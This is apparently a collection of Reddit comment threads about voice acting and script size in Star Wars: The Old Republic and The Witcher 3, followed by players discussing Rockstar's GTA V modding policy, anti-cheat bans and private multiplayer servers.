http://www.pcgamer.com/star-wars-the-old-republic-scoops-guinness-world-record-for-voice-acting/ Obvious MMO problems that game had aside, first time going through each story was super fun because of the voice acting. It was the best single player mmo I've ever played Playing it now f2p sucks because I just want the stories, and exp is cut for non subs so I have to grind to level when I just want to see how my inquisitor story ends up Because it should never have been an MMO. It should have been a single player RPG. RIP my hopes for KOTOR3 :( I just wanted to power through the main story but the mmo aspects made me need to do sidequests. funny how I've been hearing about they are doing a main quest xp boost promotion, I guess I wasn't the only one Yeah it's a 12x exp boost, essentially you can hit 55 or 60 by doing only the storyline quests. Almost pulled me back in until I saw all the micropayment stuff they bolted on. No real interest in going back to it unfortunately.  [deleted] [deleted] This just proves even more that cd projekt red spared no expense in making their game. I have played for over 60 hours and barely scratched its surface. Hopefully they are able to make the costs of production back in folds and come out with another game with such clear passion and love poured into it. I feel like a jerk for getting bored after about 10 hours.  I keep seeing these posts about all the dedication and hard work that went into a game that I'm struggling to enjoy. You shouldn't. The Witcher 3 is a great game, and a lot of effort was clearly put into creating it, but that doesn't mean that you need to like it. Not everyone will enjoy any one thing. If you don't like the Witcher, then don't force yourself to play it just because you feel like you SHOULD like it. If it's not for you, it's not for you, and that's ok. At the same time, there are some games that people have raved about that I tried to play only to quit a few hours in... then when I went back to try again a few months or years later I devoured it just like everyone else said they did.  Sometimes it just comes down to whether or not you're in the mood for a particular kind of game or any game at all at the time and the same often applies to books as well. So just keep in mind you can always come back to it later and when you eventually do, it might surprise you. Might just be expectation too. You go into a hype game expecting the world and make yourself keep playing even though you're not into it at the moment, and it's not scratching the itch for you. Then you come back ages later, not really expecting much from it, just to kill some time, and with expectations gone, you really enjoy it. I went out of my way to avoid hyping this game in my mind, I avoided just about all the lead-up teasing, news, anything related. 

It was like navigating a minefield, but it was worth it when I look back and think of all the times I got a new game just to be initially off-put by it not living up to my unrealistic expectations. 

I feel like I've been pleasantly surprised by new things, where I might have otherwise found those things underwhelming. Hype can definitely do that to me as well. For example Pillars of Eternity got ~5 hours of play time from me and is sitting there waiting for me to come back. I'm sure I will and I'll be really impressed by it but until then It'll be waiting.

Another was bioshock. Had to play that like 3 times to get through to the end.  Funnily enough it was the exact opposite for Pillars with me... I love, love, love BG1/BG2/IWD/IWD2/PS:T (and replay them all every few years) but for some odd reason I just couldn't get into the BG1 enhanced edition when it came out so it killed all the hype I had for Pillars.  But when I saw Pillars for cheap at GMG a little while ago I thought 'at that price why not give it a try'... 75 hours of playing in a week later and I just started my second play-through but this time on Path of the Damned . So I think you're spot on that hype has a lot to do with it too. I was one of the backers. Kind of over hyped it for me. I'll love it when I come back to it I'm sure.  Same, backed it almost immediately, yet have only put like 4-5 hours into it if that. Don't regret backing it, just not quite in the mood for such a game at the moment. I feel like once the winter months come along, I'll be ready for a nice long cRPG. You just described my experience with Mass Effect. I played the first one when it came out and was unimpressed, but I bought the trilogy last year and played the shit out of it. I loved every second!  I couldn't believe that I didn't like it to begin with That pretty much happened to me with Witcher 2. First time I played it about a year ago or 2, I thought it was OK, left after an hour or so.

Now re-downloaded it to prepare for W3 and I got fucking hooked. I simply couldn't stop playing it, completed it in 3 days (24 hours total, most were the first day), and I'll be honest here, I very well would've done it in 2 days if I could have.  This hits home with me regarding books and reading in general. I'm reading ASOIAF and I put the books down for like a year because I was bored, only to pick them back up a year later and devour them. Not every game is for everyone. Don't worry about not liking something that's popular. [deleted] [deleted] [deleted] [deleted] The Witcher seems like it's going to be one of those love it or hate it games. As someone who loves fantasy books the story and world is exactly my style, and as someone who loves Dark Souls the preparation and the simple on the surface combat really does it for me. That being said a lot of the game seems pretty clunky (movement in particular) and it relies heavily on cutscenes and dialogue, easy to see how some people are getting bored. I finished the bloody baron quest line and I just can't find the motivation to continue. I don't see the same game as, what seems like, literally everyone else. Any every time I mention this in anything about CDPR or Witcher, I get downvoted. Not every game is for everyone. I think it's a fucking brilliant game, but the inventory makes me want to gouge my eyes out. So does the swimming.

I also wish the "witcher stuff" was more important. Even on Death March I can faceroll 90% of encounters. Sword, Signs, or Alchemy, the build doesn't really matter once you get past about level 10. A tough encounter might make me use a couple potions, normally I just roll with a decoction or two. I wish I had to have oils and potions prepared for specific threats. I wish there was a bit more variety to boss monsters. I liked using the different bombs as alchemy, too bad the inventory system is awful. They need to add a hotkey bar for swapping bombs, or even just a "favorites" tab in the inventory. I spent more time in the inventory screen than I spent fighting as a bomb build.

Even with all of those gripes, this is my favorite game to come out in years. The stories, characters, and themes are just all fucking spot on. The side quests are *infinitely* better than the shit from dragon age or skyrim. Really it's the first RPG where I feel the open world and storylines were both just done fantastically well. The only other game that came close for me was Red Dead Redemption. The inventory and the amount of menus, as well as some of the janky and awkward animation. Also, falling 4 feet should not kill me. I have had several set backs because of this bullshit. Though the lack of a more recent save is my fault, but 4 feet? Really? This guy who was trained for years in swordplay and acrobatics, is unable to fall four feet without dying or at the very least losing tons of health. For fall damage, hit "B" or whatever your sidestep button is to roll when you hit the ground. You can fall a good distance without taking damage using that method.

But yeah, fall damage is a bit out of whack. He's got a bad knee, besides you can roll and essentially negate most fall damage.  Did you like the Baron questline? I loved it but absolutely hated the next portion of the game in Novigrad. It was extremely boring to me, but everything since then has been great again. Honestly there is no such thing as a game for everyone. Maybe your just not a fan of the genre or need to play game in a different way. Try going for side quests if you have not or if you have, just do main quests and explore world. Try changing your gameplay up and if you just cant get into it. Wait for a few mods or improvements to game and maybe you will enjoy it in a new light later on. Well they already have their next game, which is Cyberpunk 2077. But they won't be focusing on it for a couple years. And it shows. The Witcher 3 is an incredibly beautiful game, not just visually, but in so many other ways too. You hardly notice the difference from the main quest and the side quests since it all has so much depth and detail that blends so well into the fantastic game world. It's also one of the first games in a really long time that haven't made me feel like a "player" in a world that revolves around me. I really like how the sidequests in an area share their lore. 

Sure if you are in a hurry or don't bother for that sort of thing, they make for great stand alone tasks, but they often give subtle context to one another and tie each other's loose ends in unexpected ways. 

 And the length of the side quests is pretty good too, you can play 1 or 2 per sessions and have the equivalent of an episode of some fantasy series that doesn't exist. This is a big ass game. It's a shame that I'll probably never hear all the dialogue because it's extremely well written and acted.  It is about the same amount of text as the main Lord of the Rings Trilogy which sits about ~470000 words.

Witcher 3 has less text than Final Fantasy VII which has ~600000 words. But FF7 had zero voice acting, which adds up in time and costs very quickly. Where FF7 lacks in voice acting, it makes up for in convolution. What was convoluted about FF7? They explain things rather well and it was very straightforward. I played the game when I was like 9 and understood it just fine. I'm currently playing through FF VII for the first time ever and I'm about half-way through the second disc. For some reason it doesn't seem that the game has that much text in it or it's very well hidden unless you go exploring. FFVII is actually pretty famous for having a ton of secret cutscenes that very few people find on their first playthrough. A lot of them are pretty important to the story too concerning stuff like Aeris' parents or what happened to Cloud and Zack after the incident at Nibelheim. Then of course you have stuff like Yuffie's big sidequest in Wutai or Vincent's very existence. Not to mention all the various Golden Saucer dates. Barrett is my waifu! Why would the dialogue being well written and acted prevent you from hearing it all?!?!? Because the game is absolutely massive, I'll probably never get around to witnessing all the branches of the dialogue trees.  Hence my obsession exploring every inch of velen. Nearly 25 hours in and I'm about to enter Novigrad for the first time. 55 hours in here. Haven't left for Skellige yet. Half the map still covered in question marks. It's so big I've resigned myself that I'll likely never finish it. I'll always have something new to see in it.  Even if you complete a 100% play through, you'll probably only see about a quarter of the script.  The rest is along paths that your choices veered away from.

That's where Story mode is going to be fun after you finish the first play through.  Check out some of those other paths the quick way. I'm telling myself it's totally okay to not do everything. Even though I'll still do everything by the end of it... The problem is that even if you explore every inch, you'll still miss dialogue due to the choice system. RPGs kill me. And the 36 different endings. I think the original guy was pointing out that your sentence was ambiguous, due to lack of grammar. [deleted] [deleted] In fairness, I don't see myself completing more than maybe 70% of the content. Not because I'll get bored, because its excellent, but there's just soooooo much. Uhhh does nobody care that the voice actor claim in the title is bullshit? It's 950 "speaking roles," not voice actors by a long shot. It's OP's vault. The article says "950 roles" as in "950 different in-game voices/characters" not "950 actors in real life" but OP changed it to 950 actors. THIS is how you voice cast a sweeping, epic RPG! I'm a voice actor myself, and nothing takes me out of a game more than sloppy VO work, or when the same actors keep popping up over and over within one game. Bethesda should take note for their future projects-- yes it's expensive and time consuming to do this kind of audio direction, but for heaven's sake give some more actors work and hire more than 10 people to voice every single character in Tamriel.

The Witcher 3 benefits from this immensely-- every character feels unique and alive thanks to diverse and incredibly well directed voice talent, even random peasants become memorable! Even in Witcher 3 you start noticing lots of the same voice actors, especially the ones with very distinctive voices (that one very deep/hoarse male voice comes to mind). But then there's not really a way to avoid this. Though not using very distinctive voices for common peasants would help somewhat. 

Just a minor thing anyway, overall I'm very pleased with the VO work in this. I know exactly the voice you're talking about. I've only heard him on three or four characters but each time I recognize him, whereas I've probably heard other voices reused more times without noticing. The general merchant type's "Greetings" comes to mind here. The merchant archetype is basically as close as the Witcher series gets to Nurse Joy in terms of reused assets Bahahaha, you aren't paying attention to all the other NPCs? Because EVERY SINGLE peasant NPC who's not part of a large quest is reused numerous times. Hell, the little kids from the mandatory story quest in the bog are reused -- I think there are like 5 kids in the world. Also like one old peasant lady. I keep seeing the same character model for the little girl that Ciri meets all over the place. She even has the same line of idle dialog, something like "Thhhisstle... thistle!" and I'm like wait, shouldn't you be in the Baron's kitchen? Those voice actors you hear over and over in multiple roles can be incredibly important though. Like for Arkham City's mooks. I think there must be like, 4-5 main voices for them, but they make up most of the spoken lines, and they're extremely good at it. &gt;when the same actors keep popping up over and over within one game.

Well Witcher 3 has that happening very often, even more common in cities. You'll hear Letho's VA, Ivoreth's VA, and Roche's VA. Too be fair they try to spice up their voices in some degree most of the time, still their voices are just too recognizable. 

The most hilarious one is hearing Roche's VA come out of a generic soldier serving under Roche.
 I definitely noticed Iorveth a couple times. He's really just too distinctive to get away with being a random voice in the game. &gt; or when the same actors keep popping up over and over within one game. 

I've noticed two actors popping up multiple times. One of them being the same guy who voiced Roche in TW2. The other one I just remember clearly his rather deep voice. Either way, there's a bit of the same actors popping up over and over within one game. Understandable and I'm not bothered by it myself, but it's there.  Whoever did Warden Blackwall's voice from DA:I voices a lot of peasants in this game. He tries to vary his voice a little for each character so it's not obvious, but I picked it out pretty quick. Not that it's bad, he has a great voice for gruff characters. Blackwall is my favorite companion in that game.  I notice similarly constructed NPC faces popping up more frequently than I do voices that sound familiar.   Yeah, it was super jarring when at one point I, by coincidence, did two contracts back to back which were offered by identical women Haven't noticed it with adults, but I've seen the same 4 or 5 toddlers all around the world.  [deleted] Well, I wouldn't be surprised if the game had a huge amount of voice actors, but I highly doubt there are actually 950 individual people voicing all the characters.  I think OP misread the article when writing that title. Yes, god damn as much as I love Fallout 3, the VA was terrible most of the time, and every. single. male. character. had the same voice. I've been playing through Skyrim again and I've been noticing the VA that does Belethor is EVERYWHERE! His voice is great, but they definitely could have used him a little less. [deleted] Counting translations? Most likely. While not all voiced out, both Baldurs Gate 2 and Planescape: Torment had over 1,000,000 words of dialogue + text. I fucking love The Witcher 3, all the voice acting and facial cues are so damn good. Constantly while watching them talk I see a little raised eyebrow here, or a little slight tilt of their lip, little details that add so much to the character and tell you so much. I love how polished to game feels, CDProjekt Red should feel truly proud of what they've made And they did a long RPG without filling it with meaningless padding [deleted] [deleted] [deleted] I'm just surprised at learning an average novel is under 100k words.  That seems like it'd be a really light book, my favorite series averages ~300k per volume. What's your favorite series? Wheel of Time, by Robert Jordan.  The whole series is 14 books and a prequel novel, totals almost 4.4m words.  And to be fair, it does definitely drag on in a few spots, especially in the middle third of the series. Yeah, I've heard mixed things about it overall, like how one book was about beetles eating crops and nothing else or something along those lines. I was going to get into it around the time I head Sanderson was brought in to finish it, since I'm a big Sanderson fan, but it seemed like a huge commitment. Personally, I loved the series. The slow down in the middle was noticeable, but I think it's exaggerated by people who had to wait multiple years between books. [This post](https://www.reddit.com/r/Fantasy/comments/2d8cvb/yes_you_should_read_the_wheel_of_time/) is pretty good. I agree, the slowdown was noticable in the 5th book for me especially. The 2nd, 6th, and 12th books were my favorites overall. Good series and its easily worth getting through some of the slower parts as it builds up the events really well. Its a huge commitment but worth it if you are a fan of the fantasy genre. The 2nd book is what really hooked me. I liked the first book enough to give the 2nd book a try. And the 2nd book was amazing, it really got its hooks in me then. I recommend it. A Song of Ice and Fire has something like that per volume I think. AGOT, ACOK, and AFFC are all around 300k.

ASOS and ADWD are above 400k. Yeah, I was going to say "roughly four novels... or one Brandon Sanderson novel", haha. Us sci-fi/fantasy fans get lots of massive doorstoppers. Holy crap. Also, for reference, National Novel Writing Month has a cutoff at 50,000 words for a novel classification. Wikipedia lists 40,000. So, it could also be called 9 novels worth of script. Which, as someone who has done 50k, is a staggering number.  Yeah, but you wouldn't spend 100 hours+ reading a novel, and even if you did it wouldn't be as repetitive and "normal" as the 100,000 lines used in a game.  It's what I love about games.  Man I REALLY want to progress to the end of the story (I feel like I'm pretty close now) but at the same time I want to do these side quests because I feel like I will never touch them if I finish the game. I think I ended up missing an important character who I didn't kill at the end of Witcher 2 in one of these side quests. Was curious compared to something similar. Assuming [this wiki page](http://dragonage.wikia.com/wiki/Voice_cast_%28Inquisition%29) is correct, to this there are *only* 130 voiceover credits in Dragon Age: Inquisition.

The Witcher 3 has a lot of VAs. As others have mentioned, the article doesn't specify that all the voice actors are for the English version. That Dragon Age wiki page is only showing English voice actors. That's the number of VAs, not speaking roles like in the title. I suspect that they're counting any named character as a speaking role, and as others have said they do reuse a lot of VAs (but fair enough, so does every big game). [deleted] The auto-mod has ruined this thread. Personally would rather not see the shit spammed all over the place. Worse than the dumb shit it deleted? Is this more that the old republic? This is really awesome.

I was listening to a conversation ingame and was thinking how many hours went into the animation which we see during the conversations. Many of them are not just standing right in one place they move, sit down, wave their hands around and stuff. 

It seems simple but when you think about it, it makes a huge difference. a lot more immersive for me that Dragon Age's tilted camera They absolutely killed it in this game. Some cut scenes and dialogue is less memorable than others but there has been certain side quests that felt so well put together that it's nearly equaled what I've got out of other entire games. 

The PC version has definitely had some release hiccups and it's not a prefect game but what I do love is they don't treat the gamer like an idiot. You can play how you want, where you want. Shit is hard to figure out sometimes and it can be a difficult game but that's what I enjoy about it so much.  And it is so enjoyably worth it.

Honestly, this is the first open-world RPG that I have actually listened to the full dialogue interaction and not skipped "cinematically" -- let the (main story) voice actors state the first sentence or core sentiment of a part of a conversation, progress the conversation, repeat -- but listened to the entirety of the conversation even if it is as simple as getting some lady's pan out of a house.

The game has rough edges, but the size of it and the depth (I would say if Skyrim were a wading pool, Witcher 3 is a pool without a shallow end - neither is a good thing) as well as the quality in so many key areas for story (facial animations, writing, vocal delivery, content diversity and quality) makes this game arguably the best open world "medieval" RPG that I think has ever been made. [deleted] It was worth it.

I almost feel guilty for spending far too much on a new card and getting it for "free". I'm a cynic and it is **still** the best games in years if not decades. Does somebody know how long the german version took or 2.5 for every language ? What I wanna know in a couple of months: least picked options and least heard dialogue.

Would be nice if 6 months from now CDPR could come out and say": This many options have not been found by anyone anywhere.

Or something close to it. I'd like to know which audio codec TW3 uses. Since there's a ton of voice acting they'd probably go for something voice-specialized so it's probably not MP3 or Ogg. Speex maybe? one of the actors is the one that does the voice of Blackwall in Dragon Age, he does many voices and has that distinct accent [deleted] &gt; We have always appreciated the creative efforts of the PC modding community and we still fondly remember the awesome zombie invasion mod and original GTA map mod for GTAIV PC among many other classics. To be clear, the modding policy in our license has not changed and is the same as for GTAIV.  Recent updates to GTAV PC had an unintended effect of making unplayable certain single player modifications. This was not intentional, no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing. It also bears mentioning that because game mods are by definition unauthorized, they may be broken by technical updates, cause instability, or affect your game in other unforeseen ways.

Reply from Rockstar concerning mods in GTA 5. I just wish you could make your own game so you can fuck around with your friends with these mods. Freeze my character or something! The mods I have been seeing on youtube are hilarious and would be so much fun with your friends. A good solution for this would be dedicated servers, with filters for mod protection and whatnot. That's basically how it was in IV. It would say if a game was modded or not, and if you tried to join an unmodded game with mods, it wouldn't let you in. Why didn't they do that this time around, honestly? Was it just an oversight or something else? Because having people play on private servers with cheats/mods means people wouldn't be playing on their vanilla servers and therefore not buy their microtransactions. I assume it's only a matter of time before someone reverse engineers the server protocol and makes private servers available. Dude, look up FiveM it's already working. Working may loosely apply here. It's a long road before 5m is a contender for gtao. It's still fairly good considering how quickly they got anything working at all. Agreed that it will take a while before people leave GTAO for it. I think the subreddit for the most popular one is /r/fivem  Wow so after looking through that sub I think I'll wait on trying it. I think there's a couple multiplayer mods in the works.  It's always a matter of time private servers exist for dedicated MMO games like World of Warcraft, there isn't any logical reason they won't exist for GTAV Money is so easy to make I forgot they had micro transactions.  how do you make money? Heists with in-game crew/friends on hard. There's micro transactions un gtaV? You can buy GTA Dollar for money. It is like spending your vacation in a foreign country. you have to change your home-country currency into the foreign country currency and you always end up with less than before. It's like that but also you just went on vacation where everything you could ever want was free, all you had to do was walk or drive around and get it. exactly. Nobody knows about it because it's so useless. Literally nobody will pay for gta5 money because heists give you so fucking much it's ridiculous.

Heck if you read the article the first question is The real question is: on what are we going to spend the money from the Heists? (For those who have practically everything)  vens243 2 of the people I play with bought $100 worth of in game money. Trust me... People are buying it. Lots of people think it's because online mods would interfere with their p2w-esque system they go going on right now. I'm inclined to agree.  Online is, in no way, pay to win. It's incredibly balanced.  He's referring to the cash cards. I know.  Money means very little.  Level is the relevant factor as far as gear goes. Either way, less people on those servers means less money for Rockstar. Simple as that. It takes forever to get money to buy things imo.  I disagree, but my crew and I take heists a bit more seriously than most (without being assholes).  We're small, we practice and study them to find more skillful, more effective ways to win, and we just have fun with each other.  The money just appears. A dedicated crew will always be easier than pugging it, but a lot of people (probably MOST people) don't have a dedicated crew that plays at the same time and wants to do heists/missions every time. With that under consideration, it's a lot easier to get levels than make money.

You can level up all day on races or deathmatch, but without a reliable crew you can spend 3 hours, sometimes more, just to get 150k from a heist. My friends and I are too busy and on way different schedules so we can't effectively do heists and regular missions are boring and suck for money. Since the update we've only managed to do 3 heists =/ Me and my friends all tried the prison heist with random folks and we never got past like the 2nd mission. Then we all did it together and were able to knock out several heists pretty quickly. My guess is just how the whole system works. They wanted a very unique online experience with the whole leveling system and what not. Instead of having people find games to join they wanted EVERYONE to be able to work together quicker and find jobs quicker.  They could have a totally separate sandbox mode with no persistent characters, no missions, and no leveling. Just the open world with friends so you can fuck around Yea but they can't make money off of that. Except that they *did* make money off that. All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. And not only did Rockstar not delivery that functionality, but they are actively going to punish anyone pursuing it. But they don't see a way to keep making money off of it if they make it moddable online with private/dedicated servers. 

They don't want to make a one time payment they want what everyone else is doing, especially mobile gaming. In game purchases/DLC for everything. &gt; All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. 

They had no reason to think that was a possibility though.  The sad thing is they have options for invite only (friends/crew) and solo online sessions. If I start up one of those, I should have the option to allow mods. Yeah I agree. Even if it freezes my whole character so I can't buy anything, but am giving whatever for free during the session. Or it makes me create a new character just for modded games. I don't know. [deleted] It's not that simple though. You also need to freeze progress so you couldn't do an all civilians drop a million dollars mod. Definitely possible, but possibly a good deal of work, so it makes sense why that isn't a priority for them. exactly, if you had any mods it would just place you in a modded lobby. That's fairly standard practice for quite a few games and it really shouldn't be that hard for Rockstar to implement. I guess it's too much work for them. There's a couple of project going on to achieve that I think, can't like because Imm on mobile just now.  [FiveM](http://fivem.net) is already functional (though still early in development, of course). While I agree a great idea, it would still need an online profile which is integral to GTA Online. The profile is what ties your character to their money which Rockstar monetizes.

Unless modders create a way to make say dummy accounts on dedicated servers that expires after a set amount of time? Expiring is only implemented to stop people playing only with the dummy accounts as opposed to playing the real game.

Spit balling idea's 
 FYI there are a few 3rd party online servers being worked on now that won't have the restrictions of the official rockstar ones.

Edit: such as http://multiv.mp/ and http://fivem.net/ We used to do this in Dark Forces 2 back in the day.  People would make hacks, called cogs if I remember correctly, and wed have big hacker battles on the premier online gaming service, Microsoft Zone.

For example, I remember one that would make your target spin in place at insane speeds.

God I feel old. There used to be a few CS servers like this too. Fun times.

They still have it, its just called matchmaking now though. Yup, I remember playing on servers like that. Good times.

There was even a poor man's Garry's Mod hack. You could place one of ten or so models over and over again, or delete models. Precisely, something that has been available to people with Jailbroken PS3s and JTAGed/RGH Xbox 360s for pretty much 2 years now. I suspected the people giving anicdotal evidence about being banned for mods in SP were either lying or didn't understand how detection worked.

For those wondering how to disable mods when you go online, Script Hook V mods are automatically disabled but if you want to be sure and/or have other mods that don't rely on Script Hook V you can use [this guide I wrote](https://www.reddit.com/r/GTAV_Mods/comments/34vmwu/how_to_write_a_batch_script_to_disableenable_mods/) which uses a bash script to rename and/or move your mods.

Edit: never mind [there is now a tool for this.](https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/) It's still useful to know how to do it though as it works on other games. [deleted] [deleted] Why can't they just have an option to jump into modded lobbies and unmodded ones? Is that such a hard thing to create? Am I taking crazy pills? Needs new UI, needs a way to freeze characters, needs lots of extra things that aren't necessarily easy to do. Not that they can't but it's not like tweak a few settings and you have a new feature, it would probably require a good deal of work. I think the majority of people who claimed "I only use mods in singleplayer and I was banned in GTA: O" totally don't understand how Rockstar's cheat detection works.

If you have the mod loaded into the game files and log into GTA: O, as far as Rockstar is concerned, you are using a modification.  They don't care if you never opened up the trainer menu in GTA:O.  If you want to play GTA: O, just use the mod launcher to make sure that all mods are disabled before going online. The mod launcher? What is it? https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ Not very knowledgable on the modding scene, does this mean mods running during single player don't turn off for multiplayer? And you could be banned for even opening multiplayer while playing with mods single player?


That would just make me less likely to run mods. Depends what you mean by "turn off." When you go online, Rockstar's anticheat detects any modded files you have placed in the game folder, whether you actually activate the mod or not. All you have to do is remove the mod files from the folder before you go online.   So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

Again, this just makes me not want to mod my game at all if it's easy to get banned accidentally for online modding. Maybe they should separate the online and offline clients like CoD does. &gt; So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

To be fair certain mods like script hooks has scripts to prevent this...For example script hook will automatically CTD if someone tries to access online. going from story mode to multiplayer is not just selecting your online character, I think there is a popup asking confirmation if the player really wants to go online, people should just be careful. You can play in offline mode IIRC Interesting that people have already been banned for it though, however, you can never be too sure if anyone telling the truth, just because they made a post online saying they hadn't used mods online, doesn't mean they actually did.

Also, why don't they just add a larger FOV range, so people don't need to resort to a mod, which would get them banned if they want a larger FOV online. The issue is probably that when they install these mods, they forget to turn them off when they go online. Even though the person isn't actually using the mod online, the servers pick up that some code is running that shouldn't (after all I believe with the trainer, it has to run code to detect whether someone is activating it), and then autobans the person for hacking.

Of course Rockstar's servers can't tell the difference between a FOV mod and one that spawns infinite money. That's what I was thinking, too. Although if they can tell if you've got a mod running as you enter online, how hard would it be to just warn the player first before a ban is enacted? Your also warning cheaters that their software is detectable and they'll warn others. Generally developers like to find out about a cheat, collect details on people using it then mass ban them in a single wave. A better way to handle it would be to provide some sort of flag these mods could set that lets the game know you're running a mod.  You could then warn players that they're about to go online w/ a mod installed but not actually divulge that the anti-cheat engine detected something.  Granted that's not likely here since there isn't an actual modding API... I assume you mean have mods announce themselves to the game on launch and warn the player if they try to start multiplayer. I guess it could work as long as you don't warn people about unflagged mods, because otherwise your telling them their cheat can be found. That is generally also the best way of doing it, in my opinion, but it is more costly and doesn't deal with cheaters as fast. It doesn't deal with cheaters as quickly on average, but if you give them instant feedback, you make it easier for cheaters to evade your detection and the worst case gets worse. Absolutely, it's a bad short term solution. But from a business perspective for GTA 5 I guess it makes sense, since the online part of GTA doesn't have that much content aside from the heists. Gives hackers an open invitation to test their cheats and tools to skirt passed those checks.

If you look at companies like Blizzard or Valve, they stick you on a list and ban in waves at random times.  This is so the people making the hacks and cheats can't see what works and what doesn't work.  Your cheat can work just fine for 3 or 4 months and then you log in one day and find out you're banned. You're exactly right. It always bugs me when wannabe programmers act as if all this stuff is easy to design and develop when they're just talking out of their asses. My dad was playing the singleplayer game with the trainer to fuck around.

He's not been banned, and if their .dll detection system does pick up singleplayer it's clearly not working that way; most people are probably bullshitting because they're not ready to get shitblasted by the community for hacking (and as a result are too self conscious about their opinion on the internet)
 Actually, if you debug GTA, you'll see that the only time the function call for checking for dll injection is during multiplayer. So yeah, they don't check you in single player  Yeah I also believed that a lot of those "BUT I ONLY MODDED SP" were either bullshitting, or went online by accident.

Shame the community still jumps on the bandwagon so fast though, as it has happened numerous times before, where hackers and idiot start stirring up a storm because they were banned for a legitimate reason. [deleted] It seems like most of the people who claim to have only 'used mods' in single player, and been banned, are confused. What they don't realise is that if the mod is simply pasting a file into the right directory, the game is going to load that whether you're playing singleplayer or multiplayer. Even if you don't use the abilities the mod gives you, it's still loaded by the game, you're still 'using mods', and it's still going to be detected if you're playing online. You need to actually remove any extra files before playing online if you don't want to be banned. Yep, exactly this.

Even if you aren't using the trainer, Rockstar can still see the mod, as it's a memory injection and I'm pretty sure that's the only thing Rockstar's anti-cheat scans for, besides manual bans of course.

Would have been great if the game was made so that you launched single player and multi-player through different .exes, where each instance of the game had it's own library, but that would obliviously disrupt Rockstars  seamless single player to online function. It's really easy to connect to online, that's why some people think they have been banned from singleplayer. A lot of people also want a reason to hate on Rockstar, which made a number of high scoring posts and comments based on misinformation.

I personally use SP mods, which I remove by exiting the game and deleting the files and I have no ban. Absolutely. Rockstar seems to be able to identify if a player is using mods/.dll injection right out of the gate, I don't see why they couldn't prevent modded players from connecting to online in the first place. Because that would be  the perfect tool for a cheat developer. Slight change -&gt; try to launch -&gt; repeat.  Then why do they still have a cheater/hacker issue, if their software is so good at banning fov changers?
 He's not saying it's impossible to cheat. Just that it's bad to give an indication if a cheat is detected or not.  Same idea VAC uses to operate - Ban em for hacking, but do it days/weeks/months after the fact so that they don't know exactly what it was that got detected. So I need to remove the mods and then reinstall them when I leave SP? That's not a problem for simple stuff like the trainers or some crap like that that's really small size-wise, but what about when texture mods and nice shader mods start coming out? If those only replace textures, you won't get banned for those no matter what, ye?

Also, as for whether you're online or not, does that mean you didn't go into an online lobby, or that you launched the game in some offline mode? Makes me sign in automatically and fucks me if I try to start it up without internet connection.  I think textures would probably be an issue due to the possibility of making transparent textures and stuff Ive been pretty loose with mods, leaving the trainer running* while I'm online because I'm lazy,  I have luckily not had any reaction on my account from Rockstar, so is it safe to use the trainer/mods again? 

  

   
*and not using, I detest online cheaters I haven't played the PC version too much yet, but iirc with the PS4 version all you had to do was select the "online" character (the same as you would with Trever/etc. Is it that easy on PC?

If anything, i'd be worried that i would misclick on PC, and be banned. Is this a valid concern? No, the most recent trainer crashes on launching the multiplayer  Its actually rockstar that started the crash to desktop... The trainer, even the latest one would still let you online until monday evening.  It seems r* added something to the online handshake that causes the ctd. It specifically says nobody has been banned for that.

&gt;no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Exactly, so people must be going online with mods installed, even if you aren't physically using the mods, Rockstar is going to detect the .dll regardless. &gt; you can never be too sure if anyone telling the truth

"Riot banned me for no reason! I was just trying to provide helpful, kind feedback to my teammates and they all reported me!"

"Valve VAC-banned me and said I was wall-hacking and I totally wasn't!"

"Blizzard banned me for no reason! I never used gold-farming bots!"

Considering how often those statements are true, you actually *can* feel pretty confident that the recent flood of complaints were largely false. GTA:O was exploding with cheaters and all of a sudden people are claiming they're being banned for innocent single player mods? Sure thing, kids. Given that they already have a way of sorting people into different buckets (good sports, bad sports) why not just add a 3rd bucket of (cheaters and modders). They still get to play and do so without affecting non modded players, unfortunately modders and cheaters have to go in the same bucket as it's impossible to tell what you're doing when you're injecting dlls. This is actually done if you get banned a lot or something. why would rockstar pay to host servers that only cheaters and modders can play on?

seems like a waste of money to support fucking scumbags who intend to ruin the online experience for others. they should do it Valve style: Get VAC banned? Get the fuck off of our servers. You can't play on their matchmaking servers for Dota2/CSGO/TF2 if you have a VAC ban for that game or range of games. Obviously community servers still exist but those are player hosted and not going to cost Valve a dime (aside from the Master list server hosting) I'm pretty sure GTA:O is p2p hosted, no skin off Rockstars nose there. While I agree that cheaters should be banned but if its at the expense of modding (awesome thing come out of modding) I would hesitate. Everything in GTAO is routed through some Amazon EC2 servers, so there is a tiny bit of overhead. I'm pretty sure it's 100% just to mask IPs, though. They're banning people for using .dll injectors though. Not because they're changing the fov. And those people are probably forgetting to disable those dll injectors before (possibly accidentally) joining a MP session. Hence why I got banned. I thought I disabled them, joined multiplier and none were working so I thought I was safe, then the patch came around and suddenly I'm banned. I was never all that into the online stuff when it was on PS3, and frankly, I'm not *that* into it for PC either.

If I could get onto a modded server though?  I might get into it. &gt;They're banning people for using .dll injectors though. Not because they're changing the fov.

Is there any other way to change the FoV to a decent setting? There's Flawless Widescreen, but that works by modifying values in memory. I've heard some people say they've been banned for using it. Why do we have PC games that don't allow you to change the FOV? It's 2015 for Christ's sake. They couldn't have added in an FOV slider during any of those numerous delays? Because of the way the engine renders and works. It doesn't always load-in everything behind you or at some far points which aren't visible at the default fov. The game was built around the same FOV so the cinematics and gameplay would feel seemless and good. FOV shouldn't be a design choice made for us. It's preference for a lot of people Very true I can't play in first person mode because it gives me a headache after 5 minutes It's clearly not purely a design choice, there are technical reasons as well.  Is changing your FOV a config setting, or a mod? If it's a mod, they can't tell the difference between a FOV mod or a mod that does anything else. I have a feeling one of the reasons they won;t do it is because the camera is clearly designed to be at that FOV any higher and you start to see the camera clipping the geometry while in a car.Though from what I can tell that should be easily fixed so there's really no excuse. &gt; people have already been banned for it

